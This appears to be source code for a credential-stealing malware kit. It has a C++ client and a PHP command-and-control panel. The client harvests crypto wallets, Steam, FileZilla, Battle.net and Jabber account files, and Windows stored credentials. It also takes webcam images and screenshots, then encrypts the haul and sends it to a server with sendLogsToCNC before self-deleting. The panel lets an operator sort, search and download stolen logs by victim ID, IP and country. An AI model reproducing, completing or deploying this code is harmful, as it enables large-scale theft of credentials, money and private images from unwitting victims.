| LPCWSTR list[] = { L"wallet", L"bitcoin", L"bither" }; 211 | parserImpl(list, count, 3, L"Crypto", TRUE, (HZIP)hZip, appdata); 212 | _free((void*)appdata); 213 | } 214 | 215 | void enumUserprofile(HZIP hZip, SIZE_T* count) { 216 | LPCWSTR userprofile = resolveEnvrimoment(L"USERPROFILE"); 217 | lstrcatW((WCHAR*)userprofile, L"\\Desktop"); 218 | 219 | LPCWSTR list[] = { L".txt", L".doc" }; 220 | parserImpl(list, count, 2, L"Files", TRUE, (HZIP)hZip, userprofile, TRUE); 221 | _free((void*)userprofile); 222 | } 223 | 224 | void enumSteam(HZIP hZip, SIZE_T* count) { 225 | HKEY key = NULL; 226 | LSTATUS os = RegOpenKeyW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Valve\\Steam", &key); 227 | if (os == ERROR_SUCCESS && key != NULL) 228 | { 229 | WCHAR value[MAX_PATH]; 230 | DWORD value_length = MAX_PATH; 231 | DWORD tpe = REG_SZ; 232 | LSTATUS qs = RegQueryValueExW(key, L"InstallPath", NULL, &tpe, (LPBYTE)&value, &value_length); 233 | if (qs == ERROR_SUCCESS && value != 0) { 234 | 235 | LPCWSTR list[] = { L"loginusers.vdf", L"config.vdf", L"ssfn" }; 236 | if(pathExists(value, FALSE)) 237 | parserImpl(list, count, 3, L"Steam", TRUE, (HZIP)hZip, value); 238 | } 239 | } 240 | } 241 | 242 | void enumFilezilla(HZIP hZip, SIZE_T* count) { 243 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 244 | lstrcatW((WCHAR*)appdata, L"\\FileZilla"); 245 | 246 | if(pathExists(appdata, FALSE)) 247 | parserImpl(0, count, 0, L"FileZilla", FALSE, (HZIP)hZip, appdata); 248 | 249 | _free((void*)appdata); 250 | } 251 | 252 | void enumBattlenet(HZIP hZip, SIZE_T* count) { 253 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 254 | lstrcatW((WCHAR*)appdata, L"\\Battle.net"); 255 | 256 | if (pathExists(appdata, FALSE)) { 257 | LPCWSTR list[] = { L".config", L".db" }; 258 | parserImpl(list, count, 2, L"Battle.net", TRUE, (HZIP)hZip, appdata); 259 | } 260 | _free((void*)appdata); 261 | 262 | appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 263 | lstrcatW((WCHAR*)appdata, L"\\Battle.net"); 264 | 265 | if (pathExists(appdata, FALSE)) { 266 | LPCWSTR list[] = { L".config", L".db" }; 267 | parserImpl(list, count, 2, L"Battle.net", TRUE, (HZIP)hZip, appdata); 268 | } 269 | _free((void*)appdata); 270 | } 271 | 272 | void enumJabber(HZIP hZip, SIZE_T* count) { 273 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 274 | lstrcatW((WCHAR*)appdata, L"\\.purple\\accounts.xml"); 275 | 276 | if (pathExists(appdata, TRUE)) { 277 | ZipAdd(hZip, L"Jabber\\pidgin.txt", appdata); 278 | *count += 1; 279 | } 280 | _free((void*)appdata); 281 | 282 | appdata = resolveEnvrimoment(L"APPDATA"); 283 | lstrcatW((WCHAR*)appdata, L"\\Psi\\profiles\\default\\accounts.xml"); 284 | 285 | if (pathExists(appdata, TRUE)) { 286 | ZipAdd(hZip, L"Jabber\\psi.txt", appdata); 287 | *count += 1; 288 | } 289 | _free((void*)appdata); 290 | 291 | appdata = resolveEnvrimoment(L"APPDATA"); 292 | lstrcatW((WCHAR*)appdata, L"\\Psi+\\profiles\\default\\accounts.xml"); 293 | 294 | if (pathExists(appdata, TRUE)) { 295 | ZipAdd(hZip, L"Jabber\\psi+.txt", appdata); 296 | *count += 1; 297 | } 298 | _free((void*)appdata); 299 | } 300 | 301 | void enumRDP(HZIP hZip, SIZE_T* count) { 302 | CHAR* credentialsdata = (CHAR*)_alloc(32767); 303 | DWORD dwCount = 0; 304 | PCREDENTIALW *pCredential = NULL; 305 | if (CredEnumerateW(NULL, 0, &dwCount, &pCredential)) 306 | { 307 | for (DWORD i = 0; i < dwCount; i++) 308 | { 309 | if (NULL != pCredential[i]->TargetName) 310 | { 311 | if (CRED_TYPE_GENERIC == pCredential[i]->Type) 312 | { 313 | if (NULL != pCredential[i]->UserName 314 | && NULL != pCredential[i]->CredentialBlob) 315 | { 316 | count += 1; 317 | wnsprintfA(credentialsdata + lstrlenA(credentialsdata), 32767, "\r\n%s : %s", pCredential[i]->UserName, (WCHAR*)pCredential[i]->CredentialBlob); 318 | } 319 | count += 1; 320 | wnsprintfA(credentialsdata + lstrlenA(credentialsdata), 32767, "\r\n%s : (null)", pCredential[i]->UserName); 321 | } 322 | else if (CRED_TYPE_DOMAIN_PASSWORD == pCredential[i]->Type) 323 | { 324 | count += 1; 325 | wnsprintfA(credentialsdata + lstrlenA(credentialsdata), 32767, "\r\n(null) : %s", pCredential[i]->UserName); 326 | } 327 | } 328 | } 329 | CredFree(pCredential); 330 | } 331 | 332 | ZipAdd(hZip, L"WinCred.txt", credentialsdata, lstrlenA(credentialsdata)); 333 | } 334 | 335 | 336 | void enumWebcam(HZIP hZip, SIZE_T* webcam_count) { 337 | WCHAR* mem = (WCHAR*)_alloc(32767 * sizeof(WCHAR)); 338 | GetEnvironmentVariableW(L"TEMP", mem, 32767); 339 | lstrcatW(mem, L"\\WebCamScreen.png"); 340 | captureCam(mem); 341 | if(ZipAdd(hZip, L"WebCamScreen.png", mem) == ZR_OK) *webcam_count = 1; 342 | DeleteFileW(mem); 343 | } 344 | 345 | void enumScreenshot(HZIP hZip, SIZE_T* webcam_count) { 346 | WCHAR* mem = (WCHAR*)_alloc(32767 * sizeof(WCHAR)); 347 | GetEnvironmentVariableW(L"TEMP", mem, 32767); 348 | lstrcatW(mem, L"\\Screen.jpg"); 349 | captureScreenshot(mem); 350 | if(ZipAdd(hZip, L"Screen.jpg", mem) == ZR_OK) *webcam_count = 1; 351 | DeleteFileW(mem); 352 | } 353 | 354 | void procCredentials(HZIP hZip, SIZE_T* tg_count, SIZE_T* autofill_count, SIZE_T* cc_count, SIZE_T* passws_count, SIZE_T* ck_count, 355 | SIZE_T* ie_count, SIZE_T* crypto_count, SIZE_T* steam_count, SIZE_T* fz_count, SIZE_T* bn_count, SIZE_T* jabber_count, 356 | SIZE_T* webcam_count, SIZE_T* screen_count, SIZE_T* userprofile_count) { 357 | LPCWSTR tg_path = resolveEnvrimoment(L"APPDATA"); 358 | lstrcatW((WCHAR*)tg_path, L"\\Telegram Desktop\\tdata"); 359 | 360 | enumTelegram(hZip, tg_path, tg_count); 361 | enumAutofill(hZip, autofill_count); 362 | enumCreditcards(hZip, cc_count); 363 | enumPasswords(hZip, passws_count); 364 | enumCookies(hZip, ck_count); 365 | enumInternetexplorer(hZip, ie_count); 366 | enumCrypto(hZip, crypto_count); 367 | enumSteam(hZip, steam_count); 368 | enumFilezilla(hZip, fz_count); 369 | enumBattlenet(hZip, bn_count); 370 | enumJabber(hZip, jabber_count); 371 | enumWebcam(hZip, webcam_count); 372 | enumScreenshot(hZip, screen_count); 373 | enumUserprofile(hZip, userprofile_count); 374 | 375 | WCHAR* sys_info = (WCHAR*)getSystemInfoW(); 376 | ZipAdd(hZip, L"Information.txt", sys_info, lstrlenW(sys_info) * sizeof(WCHAR)); 377 | 378 | _free(sys_info); 379 | _free((WCHAR*)tg_path); 380 | } 381 | 382 | extern "C" __declspec(dllexport) void exportData() { 383 | void* buf; 384 | unsigned long len; 385 | 386 | JSON_Value* root_value = json_value_init_object(); 387 | JSON_Object* root_object = json_value_get_object(root_value); 388 | 389 | HZIP hZip = CreateZip(0, 104857600, 0); 390 | 391 | SIZE_T tg = 0, af = 0, cc = 0, ps = 0, ck = 0, ie = 0, crypto = 0, steam = 0, fz = 0, battlenet = 0, jabber = 0, webcam = 0, screen = 0, 392 | userprofile = 0; 393 | procCredentials(hZip, &tg, &af, &cc, &ps, &ck, &ie, &crypto, &steam, &fz, &battlenet, &jabber, &webcam, &screen, &userprofile); 394 | 395 | ZipGetMemory(hZip, &buf, &len); 396 | 397 | BYTE* crypt_key = 0; 398 | do { 399 | CryptGenKey(&crypt_key); 400 | } while (crypt_key == 0); 401 | 402 | TRAFFIC_ENCRYPT(crypt_key, (unsigned char*)buf, len); 403 | 404 | SIZE_T log_outlen; 405 | SIZE_T key_outlen; 406 | LPSTR base64_log = base64Encode((unsigned char*)buf, len, &log_outlen); 407 | LPSTR base64_key = base64Encode((unsigned char*)crypt_key, 256, &key_outlen); 408 | LPCSTR country_code = genCountry(); 409 | LPCSTR hwid = genHwid(); 410 | 411 | json_object_set_string(root_object, "log", base64_log); 412 | json_object_set_string(root_object, "key", base64_key); 413 | json_object_set_string(root_object, "hwid", hwid); 414 | json_object_set_string(root_object, "country", country_code); 415 | 416 | json_object_set_number(root_object, "telegram", tg); 417 | json_object_set_number(root_object, "autofill", af); 418 | json_object_set_number(root_object, "cc", cc); 419 | json_object_set_number(root_object, "passwords", ps); 420 | json_object_set_number(root_object, "cookies", ck); 421 | json_object_set_number(root_object, "ie", ie); 422 | json_object_set_number(root_object, "crypto", crypto); 423 | json_object_set_number(root_object, "steam", steam); 424 | json_object_set_number(root_object, "filezilla", fz); 425 | json_object_set_number(root_object, "battlenet", battlenet); 426 | json_object_set_number(root_object, "jabber", jabber); 427 | json_object_set_number(root_object, "webcam", webcam); 428 | json_object_set_number(root_object, "screen", screen); 429 | json_object_set_number(root_object, "userprofile", userprofile); 430 | 431 | int json_size = json_serialization_size(root_value) - 1; 432 | char *serialized_string = json_serialize_to_string(root_value); 433 | 434 | sendLogsToCNC(API_URL, (char*)serialized_string, json_size); 435 | 436 | json_free_serialized_string(serialized_string); 437 | json_value_free(root_value); 438 | 439 | _free((void*)hwid); 440 | _free((void*)base64_log); 441 | _free((void*)base64_key); 442 | _free((void*)country_code); 443 | } 444 | 445 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd ) { 446 | void* buf; 447 | unsigned long len; 448 | 449 | JSON_Value* root_value = json_value_init_object(); 450 | JSON_Object* root_object = json_value_get_object(root_value); 451 | 452 | HZIP hZip = CreateZip(0, 104857600, 0); 453 | 454 | SIZE_T tg = 0, af = 0, cc = 0, ps = 0, ck = 0, ie = 0, crypto = 0, steam = 0, fz = 0, battlenet = 0, jabber = 0, webcam = 0, screen = 0, 455 | userprofile = 0; 456 | procCredentials(hZip, &tg, &af, &cc, &ps, &ck, &ie, &crypto, &steam, &fz, &battlenet, &jabber, &webcam, &screen, &userprofile); 457 | 458 | ZipGetMemory(hZip, &buf, &len); 459 | 460 | BYTE* crypt_key = 0; 461 | do { 462 | CryptGenKey(&crypt_key); 463 | } while (crypt_key == 0); 464 | 465 | TRAFFIC_ENCRYPT(crypt_key, (unsigned char*)buf, len); 466 | 467 | SIZE_T log_outlen; 468 | SIZE_T key_outlen; 469 | LPSTR base64_log = base64Encode((unsigned char*)buf, len, &log_outlen); 470 | LPSTR base64_key = base64Encode((unsigned char*)crypt_key, 256, &key_outlen); 471 | LPCSTR country_code = genCountry(); 472 | LPCSTR hwid = genHwid(); 473 | 474 | json_object_set_string(root_object, "log", base64_log); 475 | json_object_set_string(root_object, "key", base64_key); 476 | json_object_set_string(root_object, "hwid", hwid); 477 | json_object_set_string(root_object, "country", country_code); 478 | 479 | json_object_set_number(root_object, "telegram", tg); 480 | json_object_set_number(root_object, "autofill", af); 481 | json_object_set_number(root_object, "cc", cc); 482 | json_object_set_number(root_object, "passwords", ps); 483 | json_object_set_number(root_object, "cookies", ck); 484 | json_object_set_number(root_object, "ie", ie); 485 | json_object_set_number(root_object, "crypto", crypto); 486 | json_object_set_number(root_object, "steam", steam); 487 | json_object_set_number(root_object, "filezilla", fz); 488 | json_object_set_number(root_object, "battlenet", battlenet); 489 | json_object_set_number(root_object, "jabber", jabber); 490 | json_object_set_number(root_object, "webcam", webcam); 491 | json_object_set_number(root_object, "screen", screen); 492 | json_object_set_number(root_object, "userprofile", userprofile); 493 | 494 | int json_size = json_serialization_size(root_value) - 1; 495 | char *serialized_string = json_serialize_to_string(root_value); 496 | 497 | sendLogsToCNC(API_URL, (char*)serialized_string, json_size); 498 | 499 | json_free_serialized_string(serialized_string); 500 | json_value_free(root_value); 501 | 502 | _free((void*)hwid); 503 | _free((void*)base64_log); 504 | _free((void*)base64_key); 505 | _free((void*)country_code); 506 | //runLdr(); 507 | selfDestruct(); 508 | } -------------------------------------------------------------------------------- /Panel/index.php: -------------------------------------------------------------------------------- 1 | 6) { 16 | header("Location: index.php", true, 301); 17 | die(); 18 | } 19 | if ($p === "") { 20 | $p = 1; 21 | } 22 | 23 | if ($p != null) { 24 | $next = $p + 1; 25 | if ($p != 1) { 26 | $past = $p - 1; 27 | } 28 | }} else { 29 | $p = 1; 30 | $next = 2; 31 | $past = null; 32 | } 33 | 34 | 35 | $logsTotal = $pdoConnection->query("SELECT COUNT(1) FROM `logs`")->fetchColumn(); 36 | $logs24 = $pdoConnection->query("SELECT COUNT(*) FROM `logs` WHERE `date`> UNIX_TIMESTAMP(NOW() - INTERVAL 1 DAY)")->fetchColumn();; 37 | $logsweek = $pdoConnection->query("SELECT COUNT(*) FROM `logs` WHERE `date`> UNIX_TIMESTAMP(NOW() - INTERVAL 7 DAY)")->fetchColumn();; 38 | if(isset($_GET["download"])) $download = formatString($_GET["download"]); 39 | if(isset($_GET["check"])) $check = formatString($_GET["check"]); 40 | if(isset($_GET["searchLogs"])) $searchLogs = formatString($_GET['searchLogs']); 41 | if(isset($_GET["delete"])) $delete = formatString($_GET["delete"]); 42 | if(isset($_GET["comment"])) $comment = formatString($_GET["comment"]); 43 | if(isset($comment)){ 44 | $id = formatString($_GET['id']); 45 | $pdoConnection->query("UPDATE `logs` SET `comment` = '$comment' WHERE `id` = '$id'"); 46 | header("Location: index.php", true, 301); 47 | } 48 | if (isset($download)) { 49 | if(strpos($download,',')!==false){ 50 | $ids = explode(',',$download); 51 | $txt = "logs/".(count($ids)-1) ." Logs ". date("d.m.Y_H:i:s") . ".zip"; 52 | $zipAll = new ZipArchive(); 53 | $zipAll->open($txt, ZipArchive::CREATE | ZipArchive::OVERWRITE); 54 | for($i=0;$iquery("SELECT hwid, ip, country, date FROM `logs` WHERE `id`=".$ids[$i])->fetch(PDO::FETCH_ASSOC); 56 | $rootPath = realpath("logs/" . $pc["hwid"] . "/"); 57 | if(file_exists($rootPath)){ 58 | $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); 59 | 60 | foreach ($files as $name => $file) { 61 | if (!$file->isDir()) { 62 | $filePath = $file->getRealPath(); 63 | $str = date("d.m.Y_H:i:s", $pc["date"]) . "_" . $pc["country"] . "_" . $pc["ip"] . "_" . $pc["hwid"]; 64 | $relativePath = substr($filePath, strlen($rootPath) + 1); 65 | $zipAll->addFile($filePath, $str . "/" . $relativePath); 66 | } 67 | } 68 | $pdoConnection->query("UPDATE `logs` SET `checked` = 1 WHERE `hwid` = '" . $pc["hwid"]."'"); 69 | } 70 | } 71 | $zipAll->close(); 72 | header("Location: " . $txt); 73 | }else{ 74 | $hwid = $pdoConnection->query("SELECT hwid FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 75 | $ip = $pdoConnection->query("SELECT ip FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 76 | $country = $pdoConnection->query("SELECT country FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 77 | $datee = $pdoConnection->query("SELECT date FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 78 | $str = date("d.m.Y_H:i:s", $datee) . "_" . $country . "_" . $ip . "_" . $hwid; 79 | $txt = "logs/" .$str. ".zip"; 80 | $rootPath = realpath("logs/" . $hwid . "/"); 81 | $zip = new ZipArchive(); 82 | $zip->open($txt, ZipArchive::CREATE | ZipArchive::OVERWRITE); 83 | $zip->setArchiveComment(file_get_contents("logs/" . $hwid . "/information.log")); 84 | 85 | $files = new RecursiveIteratorIterator( 86 | new RecursiveDirectoryIterator($rootPath), 87 | RecursiveIteratorIterator::LEAVES_ONLY 88 | ); 89 | 90 | foreach ($files as $name => $file) { 91 | if (!$file->isDir()) { 92 | $filePath = $file->getRealPath(); 93 | 94 | $relativePath = substr($filePath, strlen($rootPath) + 1); 95 | $zip->addFile($filePath, $relativePath); 96 | } 97 | } 98 | 99 | $zip->close(); 100 | $pdoConnection->query("UPDATE `logs` SET `checked` = '1' WHERE `hwid` = '$hwid'"); 101 | header("Location: ". $txt); 102 | exit; 103 | } 104 | } 105 | if (isset($delete)) { 106 | if(strpos($delete,',')!==false){ 107 | $ids = explode(',',$delete); 108 | for($i=0;$iquery("SELECT hwid FROM `logs` WHERE id = '" . formatString($ids[$i]) . "'")->fetchColumn(0); 111 | $dir = "logs/" . $hwid . "/"; 112 | if(strlen($dir)>6){ 113 | $it = new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS); 114 | $files = new RecursiveIteratorIterator($it, 115 | RecursiveIteratorIterator::CHILD_FIRST); 116 | foreach ($files as $file) { 117 | if ($file->isDir()) { 118 | rmdir($file->getRealPath()); 119 | } else { 120 | unlink($file->getRealPath()); 121 | } 122 | } 123 | rmdir($dir); 124 | } 125 | } catch (Exception $ex) { 126 | } 127 | $pdoConnection->exec("DELETE FROM `logs` WHERE id = '" . $ids[$i] . "'"); 128 | } 129 | }else{ 130 | try { 131 | $hwid = $pdoConnection->query("SELECT hwid FROM `logs` WHERE id = '" . formatString($delete) . "'")->fetchColumn(0); 132 | $dir = "logs/" . $hwid . "/"; 133 | if(strlen($dir)>6){ 134 | $it = new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS); 135 | $files = new RecursiveIteratorIterator($it, 136 | RecursiveIteratorIterator::CHILD_FIRST); 137 | foreach ($files as $file) { 138 | if ($file->isDir()) { 139 | rmdir($file->getRealPath()); 140 | } else { 141 | unlink($file->getRealPath()); 142 | } 143 | } 144 | rmdir($dir); 145 | } 146 | } catch (Exception $ex) { 147 | } 148 | $pdoConnection->exec("DELETE FROM `logs` WHERE id = '" . $delete . "'"); 149 | header("Location: index.php", true, 301); 150 | } 151 | } 152 | 153 | if (isset($check)) { 154 | $pdoConnection->exec("UPDATE `logs` SET checked = 1 WHERE id = '" . $check . "'"); 155 | } 156 | 157 | if ($p) { 158 | $bots = $pdoConnection->query('SELECT * FROM `logs` ORDER BY `id` DESC LIMIT ' . $past . '00, 100')->fetchAll(PDO::FETCH_ASSOC); 159 | } else { 160 | $bots = $pdoConnection->query("SELECT * FROM `logs` ORDER BY `id` DESC LIMIT 100")->fetchAll(PDO::FETCH_ASSOC); 161 | } 162 | 163 | function formatString($param) 164 | { 165 | $returnString = $param; 166 | $returnString = trim($returnString); 167 | $returnString = stripslashes($returnString); 168 | $returnString = htmlspecialchars($returnString); 169 | 170 | return $returnString; 171 | } 172 | 173 | ?> 174 | 175 | 176 | 177 | 178 | Dashboard 179 | 180 | 181 | 182 | 183 | 184 | 185 |
186 |
187 |
188 | 210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 |
Total Logs
24 h. Logs
Week Logs
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |

Top 3 Countries

243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | query("SELECT country, COUNT(*) AS cnt FROM logs GROUP BY country ORDER BY cnt DESC LIMIT 3"); 255 | while ($c = $csel->fetch()) 256 | { 257 | echo ''; 258 | } 259 | }else{ 260 | echo ''; 261 | } 262 | ?> 263 | 264 |
Country# of logs
'.$c[0].''.number_format($c[1]).'
No data to display
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |

Top 3 Operating Systems

274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | query("SELECT system, COUNT(*) AS cnt FROM logs GROUP BY system ORDER BY cnt DESC LIMIT 3"); 286 | while ($o = $osel->fetch()) 287 | { 288 | echo ''; 289 | } 290 | }else{ 291 | echo ''; 292 | } 293 | ?> 294 | 295 |
Operating System# of logs
'.$o[0].''.number_format($o[1]).'
No data to display
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 | 306 | Download 307 | Delete 308 |
309 |
310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 330 | 331 | 332 | 338 | 339 | 374 | 377 | 380 | 381 | 382 | 383 | 385 | 395 | 410 | 411 | 412 | Printed ".count($bots)." logs"; 415 | ?> 416 | 417 |
StatsHWID/SystemNetworkDateVersionIDCommentActions
'; 334 | }else{ 335 | echo ''; 336 | } 337 | ?> 340 | 342 | 0) echo "color:red;";?>"> 344 | 345 | 346 | 347 | 348 | 349 | 350 | query("SELECT id,color,pattern,name FROM `presets`"); 352 | $b=0; 353 | while($presetArray=$presetsArray->fetch()){ 354 | $siteFinded = explode(";",$presetArray[2]); 355 | foreach($siteFinded as $key){ 356 | if(file_exists("logs/" . $bot["hwid"] . "/" . "passwords.log")){ 357 | if (strpos(file_get_contents("logs/" . $bot["hwid"] . "/" . "passwords.log"), $key) !== false) { 358 | if($b==0){echo '

';$b++;} 359 | echo ''.$key.' '; 361 | } 362 | } 363 | if(file_exists("logs/" . $bot["hwid"] . "/" . "cookieDomains.log")){ 364 | if (strpos(file_get_contents("logs/" . $bot["hwid"] . "/" . "cookieDomains.log"), $key) !== false) { 365 | if($b==0){echo '

';$b++;} 366 | echo ''.$key.' '; 368 | } 369 | } 370 | } 371 | } 372 | ?> 373 |
375 | 376 |
378 | 379 | 		".$bot['userID'].""; ?> 386 |
387 |
388 | 389 | 390 | 392 |
393 |
394 | 		396 |
397 | 401 |
402 | ">Download 403 | ">View passwords 404 | ">View browsers 405 | ">Mark as checked 406 | ">Delete 407 |
408 |
409 |
418 |
419 | 420 | 454 |
455 |
456 |
457 |
458 |
459 | 460 | 461 | 462 | 465 | 468 | 471 | 513 | 540 | --------------------------------------------------------------------------------